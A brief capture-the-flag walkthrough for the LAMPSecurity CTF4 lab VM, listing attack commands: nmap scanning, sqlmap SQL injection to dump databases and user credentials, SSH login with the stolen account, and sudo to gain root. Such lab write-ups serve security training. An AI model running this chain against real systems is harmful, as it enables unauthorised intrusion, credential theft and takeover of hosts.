LAMPSecurity: CTF4
-------------------

1. Network Scanning (Nmap, netdiscover)
	netdiscover -i vmnet1
	nmap -A -p- 192.168.108.128

2. Surfing HTTP service port (80)
	find url used to fetch data from database
	http://192.168.108.128/index.html?page=blog&title=Blog&id=6

3. SQLMAP Scanning
	sqlmap -u "http://192.168.108.128/index.html?page=blog&title=Blog&id=6" --batch --dbs --dump

4. Extract databases and user credentials
	sqlmap -u "http://192.168.108.128/index.html?page=blog&title=Blog&id=2" -D ehks -T user --dump

5. Login into target machine via SSH
	ssh dstevens@192.168.108.128

6. Exploiting target with SUDO binaries
	[dstevens@ctf4 ~]$ sudo -l
	User dstevens may run the following commands on this host:
		(ALL) ALL

7. Get the Root access
	[dstevens@ctf4 ~]$ sudo su
	
Hurray!! I got the root access.
